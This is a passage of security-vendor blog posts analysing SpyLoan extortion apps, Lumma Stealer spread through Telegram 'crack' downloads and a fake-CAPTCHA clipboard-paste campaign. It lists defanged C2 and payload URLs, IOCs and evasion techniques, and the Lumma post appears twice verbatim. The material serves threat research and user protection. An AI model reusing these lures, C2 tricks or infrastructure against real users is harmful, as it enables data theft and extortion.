• hxxps://tlon.pegetloanability.com/anerf-gp/jwnmk/dgehtkzh

Using the same technique and obfuscation methods SpyLoan samples hide in his code the ability to exfiltrate larges amount of sensitive data from their victims, including:

• Call Logs: Collects call log data from the device if permissions are granted
  • Number: The phone number of the caller
  • Type: Type of call (incoming, outgoing, missed)
  • Duration: The duration of the call
  • Date: The timestamp of the call
  • Name: The name of the contact (if available)
• Files in download directory with metadata: file name, extension, file size, last modified timestamp
• All accounts on the device, emails and social media accounts.
• Information about all apps installed

Other miscellaneous information collected:

• Device and Network information:
  • Subscriber ID
  • DNS Information
  • Device ID (IMEI)
  • MAC address
  • Country code
  • Network Operator Name
  • Language
  • Network Type (WIfi, 4G, 3G, etc)
  • Phone number
  • Locale information (country code, display language)
  • Time Zone
  • Development Settings (enable or disable)
  • Phone Type (GSM, CDMA)
  • Elapsed Real-Time (The elapsed time since device was booted)
  • Proxy Configuration
• SIM Information
  • SIM country ISO Code
  • SIM Serial Number (ICCID)
• Location:
  • Permission: It checks for ACCESS_COARSER_LOCATION
  • Location provider: Check if GPS or network location are available
  • Last known location: Latitude or longitude
  • Geocoding information (converts latitude and longitude into a structured address):
    • Country name
    • Admirative area
    • City
    • Street
    • Address Line
  • Device configuration
    • Number of images: It counts the number of images files in external storage
    • Test Mode: reports if the device is in test mode
    • Keyboard Configuration
    • Current time
    • Enabled accessibility services flag
  • OS Settings:
    • Android version details (version, sdk level, fingerprint, id, display build)
    • Hardware information (device name, product name, device model, hardware details, device brand, board info, device serial number)
    • System configuration (bootloader version, build host, build user, CPU info)
    • Network (radio version, system type, build tags)
  • Storage Information:
    • External storage path, size,
    • Internal storage: total size, available size.
    • Memory information: total RAM, available RAM
  • Sensor data

Data from sensors such as accelerometers, gyroscopes, magnetometers if available on the affected device. This information includes:

• Sensor type, sensor name, version, vendor, maximum range, minimum delay, power consumption, resolution.

Sensor data can be used for device fingerprinting and user’s behavioral monitoring.

• Battery Information:
  • Battery level
  • Battery status: Indicates if the devices is plugged
  • Other battery metadata: health, if present, voltage, battery technology, type, etc.
• Audio settings (maximum and current volume levels)

Victim Experiences

Users have reported alarming experiences, such as:

• Receiving threatening calls and death threats for delayed payments.
• Having personal photos and IDs misused to intimidate them.
• The app accesses their contacts to send harassing messages to friends and family.

Typical comments on fake loan apps:

For example, “Préstamo Seguro-Rápido, Seguro” had many fake positive reviews on Google Play while a few consistent users reviews that alleged abuse of the collected data, extorsion and harassment.

 

 

October 18, 2024 I do not recommend this app. They start calling and threatening you with edited photos and posting them on social media, even sending them to your contacts, a day before. Even when it’s not the due date. Not recommended at all! Pure fraud and extortion.

September 25, 2024 Horrible app, they don’t show you how much interest they will charge, which is a lot, and before the payment date arrives, they start threatening your contacts and even send you personal messages with threats and foul language, threatening to extort your family.

Meanwhile other apps receive similar negative comments:

Global Impact of SpyLoans Apps

Worldwide Issue with Local Variations

These threats are not confined to a single region; they’ve been reported globally with localized adaptations. Predatory loan apps activities have been identified worldwide not limited to the variants technically described in this post, the following incidents can provide a wider context of the impact of this threat:

• Asia:
  • India: Users faced harassment and data leaks from apps misusing granted permissions. Authorities have taken action against such apps
  • Southeast Asia: Countries like Thailand, Indonesia, Vietnam and Philippines have reported significant issues with these apps exploiting users’ financial vulnerabilities.
    • Bank of Thailand advise center
  • Africa:
    • Nigeria, Kenya, Uganda: Similar apps have led to financial fraud and unauthorized transactions, targeting a large unbanked population.
  • Latin America:
    • Mexico, Colombia, Chile and Peru: Users have reported threats and harassment, with apps misusing personal data for extortion.

Ranking of top 10 countries with highest prevalence of Fake Loans apps according to McAfee telemetry Q3 2024:

• India
• Mexico
• Philippines
• Indonesia
• Thailand
• Kenya
• Colombia
• Vietnam
• Chile
• Nigeria

Law Enforcement Actions

According to a report by the Judiciary of Peru, authorities conducted a major raid on a call center engaged in extortion and the operation of fake loan apps targeting individuals in Peru, Mexico, and Chile. 

The police reported that over 300 individuals were linked to this criminal operation, which had defrauded at least 7,000 victims across multiple countries. 

The call center employees were trained specifically to extort victims. Using information collected from the SpyLoan apps, they threatened users to extract as much money as possible by imposing inflated interest rates and additional fees. 

Meanwhile in Chile, the commission for commission for the financial market (CMF) highlights in their website tens of fraudulent credit applications that has been distributed on Google Play, also the national consumer service (SERNAC) reports more cases. 

In May 2024, the Chilean police has detained over 25 people linked to one Fake Loans operations that scammed over 2,000 victims according to La Tercera. 

Despite the efforts the activity of these malware applications continues and increases in South America and the rest of the world. 

Conclusion

The threat of Android apps like SpyLoan is a global issue that exploits users’ trust and financial desperation. These apps leverage social engineering to bypass technical security measures and inflict significant harm on individuals. Despite law enforcement actions to capture multiple groups linked to the operation of SpyLoan apps, new operators and cybercriminals continue to exploit these fraud activities, especially in South America, Southeast Asia and Africa.

SpyLoan apps operate with similar code at app and C2 level across different continents this suggest the presence of a common developer or a shared framework that is being sold to cybercriminals. This modular approach allows these developers to quickly distribute malicious apps tailored to various markets, exploiting local vulnerabilities while maintaining a consistent model for scamming users.

By reusing code and tactics, they can efficiently target different countries, often evading detection by authorities and creating a widespread problem that is difficult to combat. This networked approach not only increases the scale of the threat but also complicates efforts to trace and shut down these operations, as they can easily adapt and relocate their operations to new regions.

By understanding how these malicious apps operate and taking proactive steps to protect ourselves, we can mitigate the risks and help others do the same.

How To Protect Yourself: Tips and Recommendations

Be Cautious with Permissions

• Review Permissions Carefully: Be wary of apps requesting permissions that seem unnecessary for their function.
• Limit Permissions: Deny permissions that are not essential.

Verify App Legitimacy

• License and Registration: Ensure the institution is registered and licensed to operate in your country. Verify with your financial regulator’s authority or consumer protection agency.
• Read User Reviews: Look for patterns of complaints about fraud or data misuse, pay special attention in apps with polarized reviews that might contain fake positive reviews.
• Research the Developer: Look up the developer’s name, website, and reviews. Even if the app contains privacy policy which is mandatory on Google Play this might not be honored by scammers.

Use Security Measures

• Install Security Software: Use reputable antivirus and anti-malware apps.
• Keep Your Device Updated: Regular updates can protect against vulnerabilities.

Practice Safe Online Behavior

• Don’t Share Sensitive Information: Provide personal data only to trusted and verified entities.
• Be Skeptical of Unrealistic Offers: If it sounds too good to be true, it probably is.

Report Suspicious Activity

• Notify App Stores: Report fraudulent apps to help protect others.
• Contact Authorities: If you’re a victim, report the incident to local law enforcement or cybercrime units.

IOC

Package	App Name	Downloads	Country	SHA256
com.prestamoseguro.ss	Préstamo Seguro-Rápido, seguro	1M	Mexico	f71dc766744573efb37f04851229eb47fc89aa7ae9124c77b94f1aa1ccc53b6c
com.voscp.rapido	Préstamo Rápido-Credit Easy	1M	Colombia	22f4650621fea7a4deab4742626139d2e6840a9956285691b2942b69fef0ab22
com.uang.belanja	ได้บาทง่ายๆ-สินเชื่อด่วน	1M	Senegal	b5209ae7fe60abd6d86477d1f661bfba306d9b9cbd26cfef8c50b81bc8c27451
com.rupiahkilat.best	RupiahKilat-Dana cair	1M	Senegal	9d51a5c0f9abea8e9777e9d8615bcab2f9794b60bf233e3087615638ceaa140e
com.gotoloan.cash	ยืมอย่างมีความสุข – เงินกู้	1M	Thailand	852a1ae6193899f495d047904f4bdb56cc48836db4d57056b02352ae0a63be12
com.hm.happy.money	เงินมีความสุข – สินเชื่อด่วน	1M	Thailand	43977fce320b39a02dc4e323243ea1b3bc532627b5bc8e15906aaff5e94815ee
com.kreditku.kuindo	KreditKu-Uang Online	500K	Indonesia	dfbf0bf821fa586d4e58035ed8768d2b0f1226a3b544e5f9190746b6108de625
com.winner.rupiahcl	Dana Kilat-Pinjaman kecil	500K	Indonesia	b67e970d9df925439a6687d5cd6c80b9e5bdaa5204de14a831021e679f6fbdf1
com.vay.cashloan.cash	Cash Loan-Vay tiền	100K	Vietnam	e303fdfc7fd02572e387b8b992be2fed57194c7af5c977dfb53167a1b6e2f01b
com.restrict.bright.cowboy	RapidFinance	100K	Tanzania	e59fd9d96b3a446a2755e1dfc5a82ef07a3965866a7a1cb2cc1a2ffb288d110c
com.credit.orange.enespeces.mtn.ouest.wave.argent.tresor.payer.pret	PrêtPourVous	100K	Senegal	453e23e68a9467f861d03cbace1f3d19909340dac8fabf4f70bc377f0155834e
com.huaynamoney.prestamos.creditos.peru.loan.credit	Huayna Money – Préstamo Rápido	100K	Peru	ef91f497e841861f1b52847370e2b77780f1ee78b9dab88c6d78359e13fb19dc
com.credito.iprestamos.dinero.en.linea.chile	IPréstamos: Rápido Crédito	100K	Chile	45697ddfa2b9f7ccfbd40e971636f9ef6eeb5d964e6802476e8b3561596aa6c2
com.conseguir.sol.pe	ConseguirSol-Dinero Rápido	100K	Peru	79fd1dccfa16c5f3a41fbdb0a08bb0180a2e9e5a2ae95ef588b3c39ee063ce48
com.pret.loan.ligne.personnel	ÉcoPrêt Prêt En Ligne	50K	Thailand	27743ab447cb3731d816afb7a4cecc73023efc4cd4a65b6faf3aadfd59f1768e

 

The post SpyLoan: A Global Threat Exploiting Social Engineering appeared first on McAfee Blog.

Lumma Stealer on the Rise: How Telegram Channels Are Fueling Malware Proliferation

Authored by: M.

Authored by: M, Mohanasundaram and Neil Tyagi

In today’s rapidly evolving cyber landscape, malware threats continue to adapt, employing new tactics and leveraging popular platforms to reach unsuspecting victims. One such emerging threat is the Lumma Stealer—a potent information-stealing malware recently gaining traction through Telegram channels. With Telegram’s popularity as a messaging and sharing platform, threat actors have identified it as a lucrative distribution vector, bypassing traditional detection mechanisms and reaching a broad, often unsuspecting audience.

Fortunately, McAfee’s advanced security solutions are equipped to detect and mitigate threats like Lumma Stealer. Through cutting-edge threat intelligence, behavioral analysis, and real-time monitoring, McAfee provides robust defenses against this malware, helping users secure their personal data and digital assets. In this blog, we will explore the tactics, techniques, and procedures (TTPs) used by Lumma Stealer, examine its capabilities, and discuss how McAfee solutions can help safeguard users from this rapidly spreading threat.

• Telegram channel offering malware disguised as crack software
• https[:]//t[.]me/hitbase
• Notice the high subscriber count of 42k.
• Last post on 3^rd Nov

• Another example of a telegram channel offering malware to benign users.
• https[:]//t[.]me/sharmamod
• Subscriber count 8.66k
• Last post on 3^rd Nov

 

• Also notice that both the channels are related as they are forwarding messages from each other’s telegram channel.
• McAfee detects these fake crack software as [Trojan:Win/Lummastealer.SD]
• Threat Prevalence observed as per McAfee telemetry data.
• India is most affected by this threat, followed by the USA and Europe.

• This blog will dissect one specific file, CCleaner 2024.rar. The others are similar in nature except for the theme.
• The hash for this file is 3df7a19969e54bd60944372e925ad2fb69503df7159127335f792ad82db7da0b.

• The extracted rar contains Microsoft DLL files

• Readme.txt contains the link to the telegram channel

• CCleaner 2024.exe is a .NET application

• We load the file into Dnspy and check the main function.

• In this, we have two calls to a function UninitializeBuilder, which decrypts the blob of data that is passed to it (AIOsncoiuuA & UserBuffer) along with the key (Alco and key).

• Decryption Key (Alco) and Encrypted data (AIOsncoiuuA) for the first call.

• Decryption Key (Key) and Encrypted data (UserBuffer) for the Second call.

• Snippet of the decryption Function.

• Decrypted data is saved into variable uiOAshyuxgYUA.
• We put a breakpoint on the end of this function and run the program to get the decrypted value of each call.
• For the first call, we get the following decrypted data in memory. We see process injection API calls were decrypted in memory.

• We can also see the target program in which the process injection will take place, in this case, RegAsm.exe.
• We can confirm this through the process tree.

• We let the breakpoint hit again to get the next layer decrypted PE file

• We can observe the decrypted PE bytes, dump this payload to disk, and inspect the next stage.
• Stage1 is a V C++ compiled file.

• We checked the payload sections and discovered that it holds encrypted data.

• Snippet of the decryption loop.

• Following decryption, the data is written to two files in the AppData Roaming folder.

• The first payload written in the AppData\Roaming folder is the .NET file “XTb9DOBjB3.exe”(Lumma_stealer) and the second payload also .Net file “bTkEBBlC4H.exe”(clipper).

• Upon examining both payloads, we observed that they employ the same decryption logic as the main file(ccleaner).

Lumma stealer:

• After dumping the payload from the .NET file, we discovered it is a 32-bit GUI Portable Executable.
• “winhttp.dll is dynamically loaded into the program using the LoadLibraryExW function.

• Upon inspecting the PE file, Base64-encoded strings were identified within the binary.

• The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• We observe that the Plaintext resembles a domain, and it’s used to establish communication with a threat actor to exfiltrate the data.

• Code snippet for WinHttpOpenRequest:

List of Requests with post method:

• “hxxps://snarlypagowo.site/api”
• “hxxps://questionsmw.store/api”
• “hxxps://soldiefieop.site/api”
• “hxxps://abnomalrkmu.site/api”
• “hxxps://chorusarorp.site/api”
• “hxxps://treatynreit.site/api”
• “hxxps://mysterisop.site/api”
• “hxxps://absorptioniw.site/api”

At last, it connects to the steam community

• (hxxps://steamcommunity.com/profiles/76561199724331900),

The malware extracts the Steam account name, initially obfuscated to evade detection, and decodes it to reveal the C2 domain. This step is essential for establishing a connection between the compromised device and the attacker’s server, allowing further malicious activity such as data exfiltration and additional payload delivery. By using this technique, the attackers effectively bypass basic detection mechanisms, making it harder for traditional security solutions to identify the communication with the C2 server.

• This is the snippet of the Steam community:

• Upon checking the data, it was observed that the user’s name was obfuscated and had many aliases. We observed that the actual_persona_name fetched and it deobfuscated by the below code.

• Upon de-obfuscation, we found the plain text and its domain “marshal-zhukov.com”.

• Upon establishing a connection, the C2 server responded with configuration data in Base64 encoded format. The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• Config for collecting wallet information.

• For Browser information:

• For FTP and email information:

• It also collects system information and sends it to c2.

• Clipper:
• Once we dumped the payload from the .NET file, we found that it was a 32-bit .NET executable named “Runtime64.exe.”

• We load the file into dnspy and check the main function.

• It begins by checking the mutex(“sodfksdkfalksdasgpkprgasdgrrkgwhrterheegwsdfwef”) to see if it’s already running on the machine.
• Autorun.is_installed: This function checks if the program is set to run on system startup. If autorun is not configured, it adds one to enable automatic execution on startup.

• This file sets the hidden attribute to false to remove the hidden status and set it as a system file to protect it.

• This Clipboard Monitor.run function Uses the following regex patterns to match the wallet addresses.

• If it matches, it replaces the clipboard content with the specified address to hijack the cryptocurrency.

• Code snippet for clipboard monitor and replacement:

Conclusion

The Lumma Stealer is a stark reminder of the ever-evolving nature of cyber threats and the rapid adaptability of malware tactics. Its spread through Telegram channels demonstrates how easily threat actors can exploit popular platforms to distribute malicious code to a broad audience. With Lumma Stealer capable of stealing sensitive information and compromising user privacy, the potential damage it can cause is significant.

In this increasingly dangerous cyber landscape, having robust, up-to-date protection has never been more crucial. McAfee’s advanced threat detection and proactive defense mechanisms provide users with a vital safeguard against such threats. By combining real-time monitoring, behavioral analysis, and continuous updates to counter new TTPs, McAfee helps users stay one step ahead of malicious actors. As TTPs evolve rapidly, maintaining comprehensive antivirus protection is essential to safeguarding personal data, financial information, and privacy. Staying vigilant and equipped with the proper security solutions ensures that users are prepared to face the latest threats head-on.

Indicators of Compromise

BLTools v4.5.5 New.rar	000756bedf4e95de6781a4193301123032e987aba33dcd55c5e2a9de20a77418
Blum Auto Bot Token.rar	06715881cd4694a0de28f8d2e3a8cc17939e83a4ca4dee2ebb3078fc25664180
Netflix Online Video 2024.rar	072aa67c14d047621e0065e8529fadd0aac1c1324e10e5d027c10073fffcd023
YouTube Downloader Version 2.1.6.rar	1724f486563c5715ce1fe989e8f4ca01890970816c5ffc2e5d0221e38cf9fdb9
Full Adobe Photoshop 2024 + CDkey.rar	174690d86d36c648a2d5a595bc8cfae70c157f00c750c36fd1a29f52011af5e2
Youtube Downloader Video 2024 Version.rar	18aca8b28750c9673f1c467f5eab1bbae4ad6c79f3fe598318c203c8e664d44f
ChatGPT-5 Version 2024 .rar	24a32d763e458e5440cb18f87685cc5626bf62cd9c3ca7bab10f0ced629708ee
Valorant Checker by Xinax 2024.rar	31a818c75d35bafc58c62c7522503f90be7b684803883e5f07c4cc16f517d1d0
Activation Windows 8,10,11 FULL + CDkey.rar	338ec6016db4eb95b15bc0822fc1d745f107ae0739a57b41ef10c9f64b6c8077
Ccleaner 2024.rar	3df7a19969e54bd60944372e925ad2fb69503df7159127335f792ad82db7da0b
CC Checker AcTeam 2024 New.rar	535650b613161c011086eab9d87189aa637f8575e52442db6e81602e67a2e4f4
Netflix mail access Checker 2024 New.rar	61a17a91ce2a98b455a50ff37b33368fe3b2f3a516cf94c5d7b18e386274557b
Paypal Checker New 2024 version.rar	840a255a184d3e819a07e3749b5e32da84f607ac7025366967d12dac0c5fa859
Free YouTube Downloader 2024.rar	9be6ea9ab019c7bd59fab7097ceb9cd465a6ae0c6b9a50d55432a0bfb5e1f184
Microsoft Office 2024 + CDkey.rar	a541b66785534bca646a7691c7a2a5630947ecbd4ee2544b19a5f8347f70f923
Crypto Seed Checker 2024 version.rar	ac5c6793354b2be799ce755828d72f65a0c2ea63ccc942208c22e893a251b52c
Phemex CryptoBot.rar	b53e0759fa11d6d31b837adf5c5ceda40dd01aa331aa42256282f9ca46531f25
SQLi Dumper v10.5.rar	ce8e7b2a6222aa8678f0c73bd29a9e3a358f464310002684d7c46b2b9e8dcf23
Cyber Ghost VPN + Key master.rar	d31520c4a77f01f0491ef5ecf03c487975182de7264d7dce0fb7988e0cea7248
AIO checker New Version 9.10.rar	d67cc175e2bb94e2006f2700c1b052123961f5f64a18a00c8787c4aa6071146f
Spotify Desktop Version 2024.rar	e71e23ad0e5e8b289f1959579fb185c34961a644d0e24a7466265bef07eab8ec
Nord VPN 2024 + Key.rar	fa34c20e1de65bfff3c0e60d25748927aa83d3ea9f4029e59aaedb4801220a54
Paysafecard Checker 2024 version.rar	fb60510e8595b773abde86f6f1792890978cd6efc924c187cb664d49ef05a250
TradingView 2024 New Version (Desktop).rar	fdc6ebf3968cd2dfcc8ad05202a847d7f8b2a70746800fd240e6c5136fcd34f6
Telegram channel	·      https[:]//t[.]me/hitbase
Telegram channel	·      https[:]//t[.]me/sharmamod
C2	marshal-zhukov.com

Mohanasundaram and Neil Tyagi

In today’s rapidly evolving cyber landscape, malware threats continue to adapt, employing new tactics and leveraging popular platforms to reach unsuspecting victims. One such emerging threat is the Lumma Stealer—a potent information-stealing malware recently gaining traction through Telegram channels. With Telegram’s popularity as a messaging and sharing platform, threat actors have identified it as a lucrative distribution vector, bypassing traditional detection mechanisms and reaching a broad, often unsuspecting audience.

Fortunately, McAfee’s advanced security solutions are equipped to detect and mitigate threats like Lumma Stealer. Through cutting-edge threat intelligence, behavioral analysis, and real-time monitoring, McAfee provides robust defenses against this malware, helping users secure their personal data and digital assets. In this blog, we will explore the tactics, techniques, and procedures (TTPs) used by Lumma Stealer, examine its capabilities, and discuss how McAfee solutions can help safeguard users from this rapidly spreading threat.

• Telegram channel offering malware disguised as crack software
• https[:]//t[.]me/hitbase
• Notice the high subscriber count of 42k.
• Last post on 3^rd Nov

• Another example of a telegram channel offering malware to benign users.
• https[:]//t[.]me/sharmamod
• Subscriber count 8.66k
• Last post on 3^rd Nov

 

• Also notice that both the channels are related as they are forwarding messages from each other’s telegram channel.
• McAfee detects these fake crack software as [Trojan:Win/Lummastealer.SD]
• Threat Prevalence observed as per McAfee telemetry data.
• India is most affected by this threat, followed by the USA and Europe.

• This blog will dissect one specific file, CCleaner 2024.rar. The others are similar in nature except for the theme.
• The hash for this file is 3df7a19969e54bd60944372e925ad2fb69503df7159127335f792ad82db7da0b.

• The extracted rar contains Microsoft DLL files

• Readme.txt contains the link to the telegram channel

• CCleaner 2024.exe is a .NET application

• We load the file into Dnspy and check the main function.

• In this, we have two calls to a function UninitializeBuilder, which decrypts the blob of data that is passed to it (AIOsncoiuuA & UserBuffer) along with the key (Alco and key).

• Decryption Key (Alco) and Encrypted data (AIOsncoiuuA) for the first call.

• Decryption Key (Key) and Encrypted data (UserBuffer) for the Second call.

• Snippet of the decryption Function.

• Decrypted data is saved into variable uiOAshyuxgYUA.
• We put a breakpoint on the end of this function and run the program to get the decrypted value of each call.
• For the first call, we get the following decrypted data in memory. We see process injection API calls were decrypted in memory.

• We can also see the target program in which the process injection will take place, in this case, RegAsm.exe.
• We can confirm this through the process tree.

• We let the breakpoint hit again to get the next layer decrypted PE file

• We can observe the decrypted PE bytes, dump this payload to disk, and inspect the next stage.
• Stage1 is a V C++ compiled file.

• We checked the payload sections and discovered that it holds encrypted data.

• Snippet of the decryption loop.

• Following decryption, the data is written to two files in the AppData Roaming folder.

• The first payload written in the AppData\Roaming folder is the .NET file “XTb9DOBjB3.exe”(Lumma_stealer) and the second payload also .Net file “bTkEBBlC4H.exe”(clipper).

• Upon examining both payloads, we observed that they employ the same decryption logic as the main file(ccleaner).

Lumma stealer:

• After dumping the payload from the .NET file, we discovered it is a 32-bit GUI Portable Executable.
• “winhttp.dll is dynamically loaded into the program using the LoadLibraryExW function.

• Upon inspecting the PE file, Base64-encoded strings were identified within the binary.

• The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• We observe that the Plaintext resembles a domain, and it’s used to establish communication with a threat actor to exfiltrate the data.

• Code snippet for WinHttpOpenRequest:

List of Requests with post method:

• “hxxps://snarlypagowo.site/api”
• “hxxps://questionsmw.store/api”
• “hxxps://soldiefieop.site/api”
• “hxxps://abnomalrkmu.site/api”
• “hxxps://chorusarorp.site/api”
• “hxxps://treatynreit.site/api”
• “hxxps://mysterisop.site/api”
• “hxxps://absorptioniw.site/api”

At last, it connects to the steam community

• (hxxps://steamcommunity.com/profiles/76561199724331900),

The malware extracts the Steam account name, initially obfuscated to evade detection, and decodes it to reveal the C2 domain. This step is essential for establishing a connection between the compromised device and the attacker’s server, allowing further malicious activity such as data exfiltration and additional payload delivery. By using this technique, the attackers effectively bypass basic detection mechanisms, making it harder for traditional security solutions to identify the communication with the C2 server.

• This is the snippet of the Steam community:

• Upon checking the data, it was observed that the user’s name was obfuscated and had many aliases. We observed that the actual_persona_name fetched and it deobfuscated by the below code.

• Upon de-obfuscation, we found the plain text and its domain “marshal-zhukov.com”.

• Upon establishing a connection, the C2 server responded with configuration data in Base64 encoded format. The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• Config for collecting wallet information.

• For Browser information:

• For FTP and email information:

• It also collects system information and sends it to c2.

• Clipper:
• Once we dumped the payload from the .NET file, we found that it was a 32-bit .NET executable named “Runtime64.exe.”

• We load the file into dnspy and check the main function.

• It begins by checking the mutex(“sodfksdkfalksdasgpkprgasdgrrkgwhrterheegwsdfwef”) to see if it’s already running on the machine.
• Autorun.is_installed: This function checks if the program is set to run on system startup. If autorun is not configured, it adds one to enable automatic execution on startup.

• This file sets the hidden attribute to false to remove the hidden status and set it as a system file to protect it.

• This Clipboard Monitor.run function Uses the following regex patterns to match the wallet addresses.

• If it matches, it replaces the clipboard content with the specified address to hijack the cryptocurrency.

• Code snippet for clipboard monitor and replacement:

Conclusion

The Lumma Stealer is a stark reminder of the ever-evolving nature of cyber threats and the rapid adaptability of malware tactics. Its spread through Telegram channels demonstrates how easily threat actors can exploit popular platforms to distribute malicious code to a broad audience. With Lumma Stealer capable of stealing sensitive information and compromising user privacy, the potential damage it can cause is significant.

In this increasingly dangerous cyber landscape, having robust, up-to-date protection has never been more crucial. McAfee’s advanced threat detection and proactive defense mechanisms provide users with a vital safeguard against such threats. By combining real-time monitoring, behavioral analysis, and continuous updates to counter new TTPs, McAfee helps users stay one step ahead of malicious actors. As TTPs evolve rapidly, maintaining comprehensive antivirus protection is essential to safeguarding personal data, financial information, and privacy. Staying vigilant and equipped with the proper security solutions ensures that users are prepared to face the latest threats head-on.

Indicators of Compromise

BLTools v4.5.5 New.rar	000756bedf4e95de6781a4193301123032e987aba33dcd55c5e2a9de20a77418
Blum Auto Bot Token.rar	06715881cd4694a0de28f8d2e3a8cc17939e83a4ca4dee2ebb3078fc25664180
Netflix Online Video 2024.rar	072aa67c14d047621e0065e8529fadd0aac1c1324e10e5d027c10073fffcd023
YouTube Downloader Version 2.1.6.rar	1724f486563c5715ce1fe989e8f4ca01890970816c5ffc2e5d0221e38cf9fdb9
Full Adobe Photoshop 2024 + CDkey.rar	174690d86d36c648a2d5a595bc8cfae70c157f00c750c36fd1a29f52011af5e2
Youtube Downloader Video 2024 Version.rar	18aca8b28750c9673f1c467f5eab1bbae4ad6c79f3fe598318c203c8e664d44f
ChatGPT-5 Version 2024 .rar	24a32d763e458e5440cb18f87685cc5626bf62cd9c3ca7bab10f0ced629708ee
Valorant Checker by Xinax 2024.rar	31a818c75d35bafc58c62c7522503f90be7b684803883e5f07c4cc16f517d1d0
Activation Windows 8,10,11 FULL + CDkey.rar	338ec6016db4eb95b15bc0822fc1d745f107ae0739a57b41ef10c9f64b6c8077
Ccleaner 2024.rar	3df7a19969e54bd60944372e925ad2fb69503df7159127335f792ad82db7da0b
CC Checker AcTeam 2024 New.rar	535650b613161c011086eab9d87189aa637f8575e52442db6e81602e67a2e4f4
Netflix mail access Checker 2024 New.rar	61a17a91ce2a98b455a50ff37b33368fe3b2f3a516cf94c5d7b18e386274557b
Paypal Checker New 2024 version.rar	840a255a184d3e819a07e3749b5e32da84f607ac7025366967d12dac0c5fa859
Free YouTube Downloader 2024.rar	9be6ea9ab019c7bd59fab7097ceb9cd465a6ae0c6b9a50d55432a0bfb5e1f184
Microsoft Office 2024 + CDkey.rar	a541b66785534bca646a7691c7a2a5630947ecbd4ee2544b19a5f8347f70f923
Crypto Seed Checker 2024 version.rar	ac5c6793354b2be799ce755828d72f65a0c2ea63ccc942208c22e893a251b52c
Phemex CryptoBot.rar	b53e0759fa11d6d31b837adf5c5ceda40dd01aa331aa42256282f9ca46531f25
SQLi Dumper v10.5.rar	ce8e7b2a6222aa8678f0c73bd29a9e3a358f464310002684d7c46b2b9e8dcf23
Cyber Ghost VPN + Key master.rar	d31520c4a77f01f0491ef5ecf03c487975182de7264d7dce0fb7988e0cea7248
AIO checker New Version 9.10.rar	d67cc175e2bb94e2006f2700c1b052123961f5f64a18a00c8787c4aa6071146f
Spotify Desktop Version 2024.rar	e71e23ad0e5e8b289f1959579fb185c34961a644d0e24a7466265bef07eab8ec
Nord VPN 2024 + Key.rar	fa34c20e1de65bfff3c0e60d25748927aa83d3ea9f4029e59aaedb4801220a54
Paysafecard Checker 2024 version.rar	fb60510e8595b773abde86f6f1792890978cd6efc924c187cb664d49ef05a250
TradingView 2024 New Version (Desktop).rar	fdc6ebf3968cd2dfcc8ad05202a847d7f8b2a70746800fd240e6c5136fcd34f6
Telegram channel	·      https[:]//t[.]me/hitbase
Telegram channel	·      https[:]//t[.]me/sharmamod
C2	marshal-zhukov.com

The post Lumma Stealer on the Rise: How Telegram Channels Are Fueling Malware Proliferation appeared first on McAfee Blog.

Behind the CAPTCHA: A Clever Gateway of Malware

Authored by Yashvi Shah and Aayush Tyagi

Executive summary

McAfee Labs recently observed an infection chain where fake CAPTCHA pages are being leveraged to distribute malware, specifically Lumma Stealer. We are observing a campaign targeting multiple countries. Below is a map showing the geolocation of devices accessing fake CAPTCHA URLs, highlighting the global distribution of the attack.

Figure 1: Prevalence on the field

We identified two infection vectors leading users to these fake CAPTCHA pages: one via cracked game download URLs, and the other through phishing emails. GitHub users have been targeted by phishing emails prompting them to address a fictitious “security vulnerability” in a project repository to which they have contributed or subscribed. These emails direct users to visit “github-scanner[.]com” for further information about the alleged security issue.

The ClickFix infection chain operates by deceiving users into clicking on buttons like “Verify you are a human” or “I am not a robot.” Once clicked, a malicious script is copied to the user’s clipboard. Users are then misled into pasting the script after pressing the Windows key + R, unknowingly executing the malware. This method of trickery facilitates the infection process, making it easy for attackers to deploy malware.

Figure 2: Infection chain

Attack Vectors and Technical Analysis

As illustrated in the diagram, users are redirected to fake CAPTCHA pages through two main attack vectors:

1.     Cracked Gaming Software Download URLs:

Users attempting to download pirated or cracked versions of gaming software are redirected to malicious CAPTCHA pages.

Figure 3: Search to download the cracked version of the game

When users search the Internet for free or cracked versions of popular video games, they may encounter online forums, community posts, or public repositories that redirect them to malicious links.

Figure 4: Runkit directing the user to download the game

In this instance, a public Runkit notebook hosts the malicious link (highlighted in blue). When the user accesses the URL (highlighted in red), they are redirected to fake CAPTCHA websites.

Figure 5: Redirection happening while accessing the link

On this page, after the user clicks the “I’m not a robot” button, a malicious PowerShell script is copied to their clipboard, and they are prompted to execute it.

Figure 6: Backend script on the click button

The website includes JavaScript functionality that copies the script to the clipboard.

Figure 7: Decoded script

The script is Base64-encoded (highlighted in blue), to reduce the readability to the user. Upon decoding it (highlighted in red), mshta was found to be leveraged. The file hosted at https://verif.dlvideosfre[.]click/2ndhsoru contains a Windows binary, having scripts appended as the overlay. Without the overlay appended, the file is a clean Windows binary.

Figure 8: Windows binary with appended script

The mshta utility searches for the <script> tag within a file and executes the script embedded in it, completely ignoring the binary portion of the file. This allows attackers to embed malicious scripts alongside non-executable content, making it easier for the malware to go undetected while still being executed through mshta.

Figure 9: Obfuscated script appended in the downloaded file

Upon analysis, the script was found to be an encrypted JavaScript file, utilizing two layers of encryption. This multi-level encryption obscures the script’s true functionality, making detection and analysis more challenging for security tools. Further analysis revealed that the decrypted JavaScript was designed to download Lumma Stealer using AES-encrypted PowerShell command and drop it in the Temp folder. This technique helps the malware avoid detection by placing the payload in a commonly used, less scrutinized directory, facilitating the next stage of the infection.

Figure 10: Process tree

2.     Phishing Emails impersonating the GitHub team

In the second vector, users receive phishing emails, often targeting GitHub contributors, urging them to address a fake “security vulnerability.” These emails contain links leading to the same fake CAPTCHA pages.

Figure 11: Phishing email impersonating GitHub

Once the user clicks on the link, they’re redirected to the fake captcha pages.

Figure 12: Fake CAPTCHA page

These pages use the same technique: the malicious script is copied to the clipboard when the user clicks the button, and they are then prompted to execute it.

Figure 13: Script copied onto clipboard

This script retrieves and executes the contents of a text file hosted on an online server.

Figure 14: Invoking the remote script

The content of the text file contains PowerShell commands that download an executable file or a zip file. These files are saved into the temp folder and then executed. The downloaded files, in these cases, are Lumma Stealer samples.

Detection and Mitigation Strategies

McAfee blocks this infection chain at multiple stages:

